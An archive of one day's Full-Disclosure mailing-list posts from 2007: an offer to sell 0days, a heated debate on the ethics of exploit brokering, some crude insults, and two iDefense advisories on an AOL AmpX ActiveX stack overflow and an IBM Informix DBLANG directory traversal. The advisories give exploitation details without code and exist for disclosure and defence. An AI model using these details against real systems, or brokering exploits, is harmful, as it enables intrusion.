[Full-disclosure] still some 0days to sell

2007-11-09 Thread Juergen Marester
Hi,

I still have some 0days (just a few now) to sell about windows and linux.
information by e-mail.

see you,

Juergen

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] still some 0days to sell

2007-11-09 Thread Michael Bann
Ok, first off, this is FULL DISCLOSURE. Perhaps you meant to send this 
to I'm a haxor. Don't worry, common mistake.

Second, I highly doubt you have some 0days, if any at all. Perhaps a 
few bugs/buffer under/over flows, but nothing that, in the computer 
security field, would justify the title 0day.

Cheers,

Mike

Juergen Marester wrote:
 Hi,

 I still have some 0days (just a few now) to sell about windows and linux.
 information by e-mail.

 see you,

 Juergen

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Hushmail == Narqz

2007-11-09 Thread Byron Sonne
 Paul,
 This hardly means that the hushmail crew are narqz, it just means
 that they are cooperating with the law like any legitimate business
 would. 

No, it doesn't mean they're narqa, but it does mean they're spineless
pussies that eagerly sell people out. If a friend did that to you, what
would you think of them?

Take 'em down.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Hushmail == Narqz

2007-11-09 Thread Simon Smith
Ah well, if a friend did that to me...

hrm... I'd probably tar and feather him near an open flame. ;]

Byron Sonne wrote:
 Paul,
 This hardly means that the hushmail crew are narqz, it just means
 that they are cooperating with the law like any legitimate business
 would. 
 
 No, it doesn't mean they're narqa, but it does mean they're spineless
 pussies that eagerly sell people out. If a friend did that to you, what
 would you think of them?
 
 Take 'em down.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Why I hate you (and a philanthropic challenge!)

2007-11-09 Thread don bailey
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Dear jackasses,

I really think you should stop saying you have zero day
to sell on Full Disclosure. Mostly because no-one really gives a
shit. Also, no-one is really interested in paying for your horrible
code. It looks worse than initd.sh. Seriously. My code sucks, but
yours is far worse. Please stop wasting our time caring what you
think.

On to my idea!

I think the next 7 (I'm being very optimistic here) zero
day bugs should be bought by people giving money to charity
organizations! We don't see enough selflessness in computer
security, so stop being a dick: help save stuff that's important.

So, here's how it should work. Post your zero day up
on full disclosure. Yes, actually disclose it. Post what
charity you are releasing the zero day for. Then, we as a
public, will PayPal that charity (no, it can't be the Save
SnoSoft and Netragard Fund) some monies. Wouldn't that be
nice? We can help the EFF, battle illegal pornography or
even support your favorite politician! Doesn't sound bad,
does it?

I will personally promise to donate up to 300$ (total, I'm not
rich) to said charities assuming that they are legal and such.

NOW GET TO WORK AND DROP SOME ZERO DAY
NO, XSS DOES NOT COUNT

Donb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHNKwDyWX0NBMJYAcRAjKAAJ0TGa4nMIKxkzn0L8abxrr6hrrueQCfUkti
hul0/vIOYofT4TGBMxtBJ3o=
=T42x
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Why I hate you (and a philanthropic challenge!)

2007-11-09 Thread John C. A. Bambenek, CISSP
I'll be more than happy to volunteer my charity to receive funds. :)
(Helps AIDS orphans in Tanzania get an education and otherwise
supports schools there).

j

On Nov 9, 2007 12:50 PM, don bailey [EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Dear jackasses,

 I really think you should stop saying you have zero day
 to sell on Full Disclosure. Mostly because no-one really gives a
 shit. Also, no-one is really interested in paying for your horrible
 code. It looks worse than initd.sh. Seriously. My code sucks, but
 yours is far worse. Please stop wasting our time caring what you
 think.

 On to my idea!

 I think the next 7 (I'm being very optimistic here) zero
 day bugs should be bought by people giving money to charity
 organizations! We don't see enough selflessness in computer
 security, so stop being a dick: help save stuff that's important.

 So, here's how it should work. Post your zero day up
 on full disclosure. Yes, actually disclose it. Post what
 charity you are releasing the zero day for. Then, we as a
 public, will PayPal that charity (no, it can't be the Save
 SnoSoft and Netragard Fund) some monies. Wouldn't that be
 nice? We can help the EFF, battle illegal pornography or
 even support your favorite politician! Doesn't sound bad,
 does it?

 I will personally promise to donate up to 300$ (total, I'm not
 rich) to said charities assuming that they are legal and such.

 NOW GET TO WORK AND DROP SOME ZERO DAY
 NO, XSS DOES NOT COUNT

 Donb

 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.6 (GNU/Linux)

 iD8DBQFHNKwDyWX0NBMJYAcRAjKAAJ0TGa4nMIKxkzn0L8abxrr6hrrueQCfUkti
 hul0/vIOYofT4TGBMxtBJ3o=
 =T42x
 -END PGP SIGNATURE-

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Hushmail == Narqz

2007-11-09 Thread Micheal Espinola Jr
On Nov 9, 2007 12:57 PM, Byron Sonne [EMAIL PROTECTED] wrote:
 No, it doesn't mean they're narqa, but it does mean they're spineless
 pussies that eagerly sell people out. If a friend did that to you, what
 would you think of them?

Cooperating with a court order != being a pussy
hushmail != your friend

-- 
ME2

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Why I hate you (and a philanthropic challenge!)

2007-11-09 Thread T Biehn
So will I!
Just send all funds to Western Union in Nigeria, Dr. Priest Amdul
Bhudgetwajey...

On Nov 9, 2007 2:11 PM, John C. A. Bambenek, CISSP
[EMAIL PROTECTED] wrote:
 I'll be more than happy to volunteer my charity to receive funds. :)
 (Helps AIDS orphans in Tanzania get an education and otherwise
 supports schools there).

 j


 On Nov 9, 2007 12:50 PM, don bailey [EMAIL PROTECTED] wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Dear jackasses,
 
  I really think you should stop saying you have zero day
  to sell on Full Disclosure. Mostly because no-one really gives a
  shit. Also, no-one is really interested in paying for your horrible
  code. It looks worse than initd.sh. Seriously. My code sucks, but
  yours is far worse. Please stop wasting our time caring what you
  think.
 
  On to my idea!
 
  I think the next 7 (I'm being very optimistic here) zero
  day bugs should be bought by people giving money to charity
  organizations! We don't see enough selflessness in computer
  security, so stop being a dick: help save stuff that's important.
 
  So, here's how it should work. Post your zero day up
  on full disclosure. Yes, actually disclose it. Post what
  charity you are releasing the zero day for. Then, we as a
  public, will PayPal that charity (no, it can't be the Save
  SnoSoft and Netragard Fund) some monies. Wouldn't that be
  nice? We can help the EFF, battle illegal pornography or
  even support your favorite politician! Doesn't sound bad,
  does it?
 
  I will personally promise to donate up to 300$ (total, I'm not
  rich) to said charities assuming that they are legal and such.
 
  NOW GET TO WORK AND DROP SOME ZERO DAY
  NO, XSS DOES NOT COUNT
 
  Donb
 
  -BEGIN PGP SIGNATURE-
  Version: GnuPG v1.4.6 (GNU/Linux)
 
  iD8DBQFHNKwDyWX0NBMJYAcRAjKAAJ0TGa4nMIKxkzn0L8abxrr6hrrueQCfUkti
  hul0/vIOYofT4TGBMxtBJ3o=
  =T42x
  -END PGP SIGNATURE-
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ This email is in response to all of the emails that I see with people
trying to broker exploits by advertising them on full disclosure and
other public mailing lists. ]

SNOsoft has been legitimately and legally brokering exploits since early
2000, and we're still doing it very successfully. As a matter of policy
we will not ever purchase items from careless developers, and will not
sell to careless buyers or non US based buyers... With exploit brokering
comes great responsibility and liability.

People posting emails in public forums in an attempt to sell exploits is
not only careless and irresponsible, but is also a testament to that
persons immaturity and lack of experience. Do they ever stop to think
about the potential liability? What happens if they sell to a hostile
foreign party, what could happen to them, etc...?

I think that there is a legitimate market for Exploit Brokering when it
is done properly (ethically and legally). I think that in that market
the developers should adhere to strict rules and not cross certain
boundaries. I also think that the responsible and ethical developers
should be paid fair value for their time, instead of a pathetic maximum
of $5,000.00 for a high grade item. Think about it, the average QA
Engineer makes more money per bug than the higher talent security
researcher. There's something wrong with that.

The solution to that problem is not to sell exploits to just anyone in a
public forum. That introduces too much liability to the developer,
especially if the buyer is illegitimate or hostile. The solution is to
work with legitimate established businesses in a confidential and
responsible manner.

Unfortunately for those developers that are trying to sell exploits in
public forum, their chances of working with legitimate businesses are
gone. No way will any of the legitimate Exploit Brokers ever purchase an
item from an irresponsible developer. Its just a matter of time till
laws get passed and they end up getting thrown in jail for selling
weaponized exploits to the wrong people.

- --

- - simon

- --
http://www.snosoft.com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHNMFmf3Elv1PhzXgRAiVyAKCgKIhDLpqjkOK+Ndu+JHol2F7s1ACfbXFa
1Ju3+ZCeSWeDisUigMs1FY0=
=uA7p
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Thierry Zoller
Dear Simon,

SS What happens if they sell to a hostile
SS foreign party, what could happen to them, etc...?
Maybe they pereive your party as a hostile foreign party, this list is
obviously not based in the US.

The solution is to work with legitimate established businesses
in a confidential and responsible manner.
If you are responsible you surely can disclose who you are selling
them too ? Are you even disclosing this to the person that you
bought them from ? When not does this make you any better than
the others ?

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
Please forgive me... should I beg for mercy?

;]

Joey Mengele wrote:
 This is hardly on topic and you do not have any unique credentials 
 to validate your claims. Please refrain from writing off topic and 
 baseless editorials in the future or risk moderation. Thanks.
 
 J
 
 On Fri, 09 Nov 2007 15:22:01 -0500 Simon Smith [EMAIL PROTECTED] 
 wrote:
 [ This email is in response to all of the emails that I see with 
 people
 trying to broker exploits by advertising them on full disclosure 
 and
 other public mailing lists. ]

 SNOsoft has been legitimately and legally brokering exploits since 
 early
 2000, and we're still doing it very successfully. As a matter of 
 policy
 we will not ever purchase items from careless developers, and will 
 not
 sell to careless buyers or non US based buyers... With exploit 
 brokering
 comes great responsibility and liability.

 People posting emails in public forums in an attempt to sell 
 exploits is
 not only careless and irresponsible, but is also a testament to 
 that
 persons immaturity and lack of experience. Do they ever stop to 
 think
 about the potential liability? What happens if they sell to a 
 hostile
 foreign party, what could happen to them, etc...?

 I think that there is a legitimate market for Exploit Brokering 
 when it
 is done properly (ethically and legally). I think that in that 
 market
 the developers should adhere to strict rules and not cross certain
 boundaries. I also think that the responsible and ethical 
 developers
 should be paid fair value for their time, instead of a pathetic 
 maximum
 of $5,000.00 for a high grade item. Think about it, the average QA
 Engineer makes more money per bug than the higher talent security
 researcher. There's something wrong with that.

 The solution to that problem is not to sell exploits to just 
 anyone in a
 public forum. That introduces too much liability to the developer,
 especially if the buyer is illegitimate or hostile. The solution 
 is to
 work with legitimate established businesses in a confidential and
 responsible manner.

 Unfortunately for those developers that are trying to sell 
 exploits in
 public forum, their chances of working with legitimate businesses 
 are
 gone. No way will any of the legitimate Exploit Brokers ever 
 purchase an
 item from an irresponsible developer. Its just a matter of time 
 till
 laws get passed and they end up getting thrown in jail for selling
 weaponized exploits to the wrong people.

 --

 - simon

 --
 http://www.snosoft.com
 
 --
 Click for free info on marketing degrees and make up to $150K/ year
 http://tagline.hushmail.com/fc/Ioyw6h4dDIrjbxctdTv0TSwcEUd8ohtJYd5yOv5FWQ7CcpXXXTOy6x/
 


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread jf
 SNOsoft

When the first word in the first sentence in a communique is a company
name, you should take that as a warning everything that follows is a SNOsoft.


 People posting emails in public forums in an attempt to sell exploits is
 not only careless and irresponsible,

It's called the free-market.

 but is also a testament to that
 persons immaturity and lack of experience.

What you think that when you add the variables up that the only potential
answer is the what you've come up with? Employing the free-market is not a
testament to anything, much less a persons level of maturity or
experience.

 Do they ever stop to think
 about the potential liability? What happens if they sell to a hostile
 foreign party, what could happen to them, etc...?

Sure of course, you don't sell 0day to the organizations that the enemy of
your country, thats common sense- however you put a breach of contract
provision into your agreement that disallows transfer of content to third
parties and then dont sell them to people from guangdong, its not
stupidity, immaturity or lack of experience, its called due dilligence.


 I think that there is a legitimate market for Exploit Brokering when it
 is done properly (ethically and legally).

I wish you people would stop putting your opinions on ethics to other
people. I mean even business ethics does not follow the whats commonly
associated with being ethical, thats why there is a special class for it
in college and largely amounts to the questions 'is it legal?' and 'can i
get away with it?'.

In reality all your bantering about ethics and legality will result in is
that bug information and exploits become subject to restricted export/sale
legislation and then we'll be stuck with companies like yours.

I mean seriously, has it not occurred to you that not everyone in the
world is American and wants to sell their 0day to the NSA via SNOSoft?
That perhaps the conjecture that they want to do that is against their
morals and in turn does that not make you obtuse for expecting they abide
by your own personal set of ethics?


 I think

I don't care what you think, don't try to enforce your set of morals on
me; im sure plenty of others agree with this sentiment.

 The solution to that problem is not to sell exploits to just anyone in a
 public forum. That introduces too much liability to the developer,
 especially if the buyer is illegitimate or hostile. The solution is to
 work with legitimate established businesses in a confidential and
 responsible manner.

Not the solution is not to be stupid with your sales, you can meet people
in public forums, just be able to show due dilligence that the parties you
sold to are not enemies of your country and that their intentions are not
to violate the law. Guns don't kill people, ...

By responsible, you mean doing it the way you do?


 Its just a matter of time till
 laws get passed and they end up getting thrown in jail for selling
 weaponized exploits to the wrong people.

Which is exactly what you want. Look almost everything is legal somewhere,
that means you can't stop people who wish to conduct private business.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

First Answer:

Only work with partners that are well established, incorporated, and
have a legitimate use for the items that they want to purchase. Do not
work with individual buyers/people, there's too much liability and no
way to verify that they are actually US based. Make sure that every
single transaction is done under tight legally binding contract. Perform
background checks as necessary, etc.


Second Answer:

Same as the first one.

Obviously this is just a light summary of the process that we follow,
but it should give you an idea as to how we do business.



security curmudgeon wrote:
 Hi Simon,
 
 : SNOsoft has been legitimately and legally brokering exploits since early 
 : 2000, and we're still doing it very successfully. As a matter of policy 
 : we will not ever purchase items from careless developers, and will not 
 : sell to careless buyers or non US based buyers... With exploit brokering 
 : comes great responsibility and liability.
 : 
 : People posting emails in public forums in an attempt to sell exploits is 
 : not only careless and irresponsible, but is also a testament to that 
 : persons immaturity and lack of experience. Do they ever stop to think 
 : about the potential liability? What happens if they sell to a hostile 
 : foreign party, what could happen to them, etc...?
 
 Can you describe SNOsoft's process for validating buyers and assuring 
 they are US based? Is there any process to ensure that even though they 
 are US based they do not have any ill intention toward their country? 
 Just because someone has a US ID doesn't mean they were born here or not 
 working for a foreign party.
 
 jericho
 


- --

- - simon

- --
http://www.snosoft.com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHNMdpf3Elv1PhzXgRAigLAJ9maYZlSEEBVjQ1cEZMrz0qpM3IOwCgplaF
icYpd9+fSAcPr45wKnCgav0=
=Qr8j
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread security curmudgeon

Hi Simon,

: SNOsoft has been legitimately and legally brokering exploits since early 
: 2000, and we're still doing it very successfully. As a matter of policy 
: we will not ever purchase items from careless developers, and will not 
: sell to careless buyers or non US based buyers... With exploit brokering 
: comes great responsibility and liability.
: 
: People posting emails in public forums in an attempt to sell exploits is 
: not only careless and irresponsible, but is also a testament to that 
: persons immaturity and lack of experience. Do they ever stop to think 
: about the potential liability? What happens if they sell to a hostile 
: foreign party, what could happen to them, etc...?

Can you describe SNOsoft's process for validating buyers and assuring 
they are US based? Is there any process to ensure that even though they 
are US based they do not have any ill intention toward their country? 
Just because someone has a US ID doesn't mean they were born here or not 
working for a foreign party.

jericho

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iDefense Security Advisory 11.09.07: AOL AmpX ActiveX Control Multiple Buffer Overflow Vulnerabilities

2007-11-09 Thread iDefense Labs
iDefense Security Advisory 11.09.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 09, 2007

I. BACKGROUND

America Online's AmpX is an ActiveX control associated with AOL Radio.
It is typically used for embedding streaming audio content in web
pages. For more information visit the following URL.

http://music.aol.com/radioguide/bb/

II. DESCRIPTION

Remote exploitation of multiple buffer overflow vulnerabilities in AOL's
AmpX ActiveX control could allow attackers to execute arbitrary code
with the credentials of the user visiting a malicious website.

Several methods within the vulnerable ActiveX control (CLSID
B49C4597-8721-4789-9250-315DFBD9F525) were found to be vulnerable to
stack-based buffer overflows. In each case, variable length attacker
supplied data is copied into a fixed-size stack buffer using the
strcpy() function. Since no input validation is performed, it is
possible to corrupt stack memory, resulting in an exploitable
condition.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code in the context
of the user viewing a malicious web page. In order to be successful, the
attacker must persuade a user with the vulnerable control installed into
viewing a malicious web page. No further interaction is required.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
2.6.1.11 of America Online's AmpX.dll. Other versions are suspected to
be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, an administrator
can set the kill-bit for the vulnerable control. While this does not fix
the vulnerability, it does prevent the control from being loaded in
Internet Explorer.

VI. VENDOR RESPONSE

An updated version of AOL Radio with enhanced security features is now
available. AOL recommends that you download and install the update to
get the best and most secure performance from AOL Radio. If you use AIM
or other AOL software, you will automatically receive a prompt to update
AOL Radio and you do not need to download and install this update now.
Otherwise, please download the update from the URL below and
double-click on the file to finish updating AOL Radio:

http://radaol-prod-web-rr.streamops.aol.com/mediaplugin/unagi_patch.exe;

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5755 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/24/2007  Initial vendor notification
04/24/2007  Initial vendor response
11/09/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Thierry, my comments are below.

Thierry Zoller wrote:
 Dear Simon,
 
 Well if it wasn't obvious enough let me rephrase.
 
 SS What happens if they sell to a hostile
 SS foreign party, what could happen to them, etc...?
 Maybe they pereive your party as a hostile foreign party, this list is
 obviously not based in the US.
 SS What's your point?
 I think my point is very clear, those trying to find a buyer on this
 list (who you are directly speaking to in your post) are
 maybe not interested in selling to US based parties. You assume they
 are.

Right, I did make that assumption and that was purely based on my
perspective as a US based broker. There is no reason why the same kind
of business can't be done in other countries. I was thinking strictly
about my liabilities as a US based person and my restrictions only.
The US is only one country out of many.
 
 To make this even clearer :
 SSDo they ever stop to think
 SS about the potential liability? What happens if they sell to a hostile
 SSforeign party, what, what could happen to them, etc...?
 Maybe the hostile foreign party for them is the USA.

Quite possibly and I could think of many reasons why people would think
so, especially with our current president in office.

 The solution is to work with legitimate established businesses
 in a confidential and responsible manner.
 If you are responsible you surely can disclose who you are selling
 them too ? 
 SS That would be irresponsible.
 Why would disclosing who you are selling them to be irresponsible ?
 You argue that those seeking to sell over FD are carelss and
 irresponsible. Now why if they sell them to you makes them less
 careless and irresponsible since they still don't know with
 whom the information will end up with.

Again from my perspective it would be irresponsible as we have
confidentiality agreements in place with partners. It might not be
irresponsible for others to disclose that information.

 
 Are you even disclosing this to the person that you
 bought them from ? When not does this make you any better than
 the others ?
 SS I have no idea what you are asking me here.
 Are you disclosing _to the person_ you bought the bugs from, to whom
 you are going to sell them ? If not I don't see the interest why they
 should choose you over others for ethical reasons.

Same answer as above.

I should apologize because the initial email sounded very arrogant. With
that said, there is still responsible brokering and irresponsible
brokering. Selling exploits to just anyone is irresponsible.





- --

- - simon

- --
http://www.snosoft.com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHNNNaf3Elv1PhzXgRAsIRAKDHzj0Z6jMQk+A6Qkl1cWoQdzMApQCgjCI9
DD1lLw2QWmAVKC/7J/XmQTk=
=enDt
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Thierry Zoller
Dear Simon,

Well if it wasn't obvious enough let me rephrase.

 SS What happens if they sell to a hostile
 SS foreign party, what could happen to them, etc...?
 Maybe they pereive your party as a hostile foreign party, this list is
 obviously not based in the US.
SS What's your point?
I think my point is very clear, those trying to find a buyer on this
list (who you are directly speaking to in your post) are
maybe not interested in selling to US based parties. You assume they
are.

To make this even clearer :
SSDo they ever stop to think
SS about the potential liability? What happens if they sell to a hostile
SSforeign party, what, what could happen to them, etc...?
Maybe the hostile foreign party for them is the USA.

 The solution is to work with legitimate established businesses
 in a confidential and responsible manner.
 If you are responsible you surely can disclose who you are selling
 them too ? 
SS That would be irresponsible.
Why would disclosing who you are selling them to be irresponsible ?
You argue that those seeking to sell over FD are carelss and
irresponsible. Now why if they sell them to you makes them less
careless and irresponsible since they still don't know with
whom the information will end up with.

 Are you even disclosing this to the person that you
 bought them from ? When not does this make you any better than
 the others ?
SS I have no idea what you are asking me here.
Are you disclosing _to the person_ you bought the bugs from, to whom
you are going to sell them ? If not I don't see the interest why they
should choose you over others for ethical reasons.

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

No doubt...

[EMAIL PROTECTED] wrote:
 On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said:
 Thierry Zoller wrote:
 Maybe the hostile foreign party for them is the USA.
 Quite possibly and I could think of many reasons why people would think
 so, especially with our current president in office.
 
 Note that given the recent approval polls for said president, you can
 probably strike foreign from Thierry's comment and it still be correct...


- --

- - simon

- --
http://www.snosoft.com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHNNYpf3Elv1PhzXgRAnSOAJwNe3L78ON7kcQL3QjJefJPS+wwlwCeN+kC
ydvhgAGKVrHedbSJUhzlmio=
=0Hxy
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Thierry Zoller
Dear Simon,

SS Selling exploits to just anyone is irresponsible.
Fully agree, I interpreted your intial post as being US centric and
based on ethical judgement, hence my comments. No hard feelings =)




-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iDefense Security Advisory 11.09.07: IBM Informix Dynamic Server DBLANG Directory Traversal Vulnerability

2007-11-09 Thread iDefense Labs
iDefense Security Advisory 11.09.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 09, 2007

I. BACKGROUND

IBM Corp.'s Informix Dynamic Server is an online transaction processing
data server. It contains several set-uid root binaries. For more
information, visit the product homepage at the following URL.

http://www-306.ibm.com/software/data/informix/ids/

II. DESCRIPTION

Local exploitation of a directory traversal vulnerability in IBM Corp.'s
Informix Dynamic Server allows attackers to elevate privileges to root.

This vulnerability exists due to insufficient checking for directory
traversal sequences when processing the DBLANG environment variable. By
using values containing directory traversal specifiers, such as ../,
an attacker can cause set-uid binaries to use Native Language Support
(NLS) message files under their control.

III. ANALYSIS

Exploitation allows local attackers to gain root privileges. In order to
exploit this vulnerability, an attacker would need access to execute one
of the set-uid root binaries that utilizes the DBLANG environment
variable.

Since an attacker can control NLS message file data, they are able to
pass arbitrary format string arguments to the variable argument
function printf(3). Consequently, this vulnerability can be exploited
using publicly known format string exploitation techniques.

When attempting to exploit this vulnerability, it is likely that an
attacker would try to execute code within area of memory that are
considered data. As such, NX, XD, exec-shield, PAX and other data
execution prevention technologies can decrease the likelihood of
success.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in IBM Corp.'s
Informix Dynamic Server version 10.00 UC6TL installed on a Linux
system. Other versions are also suspected as vulnerable. Versions for
other supported Unix systems should also be considered vulnerable.

V. WORKAROUND

Removing the set-uid bit from all programs included with Informix will
prevent exploitation. However, doing so may also disable functionality.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability within version 10.00.xC7W1 of
Informix Dynamic Server. For more information, visit the following URL.

http://www-1.ibm.com/support/docview.wss?uid=swg27011082

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5670 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/01/2007  Initial vendor notification
09/13/2007  Initial vendor response
11/06/2007  IBM Released 10.00.xC7W1
11/09/2007  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Valdis . Kletnieks
On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said:
 Thierry Zoller wrote:
  Maybe the hostile foreign party for them is the USA.
 
 Quite possibly and I could think of many reasons why people would think
 so, especially with our current president in office.

Note that given the recent approval polls for said president, you can
probably strike foreign from Thierry's comment and it still be correct...


pgp4Tuw22f1BT.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Exploit Brokering

